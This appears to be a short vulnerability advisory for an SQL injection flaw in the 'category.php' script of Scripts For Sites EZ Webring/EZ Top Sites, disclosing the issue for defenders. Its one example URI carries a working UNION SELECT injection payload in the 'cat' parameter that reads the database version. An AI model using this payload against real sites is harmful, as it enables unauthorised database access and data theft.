• info
• discussion
• exploit
• solution
• references

Scripts For Sites EZ Webring/EZ Top Sites 'category.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/webring/category.php?cat=-1+union+all+select+1,@@version,3,4,5/*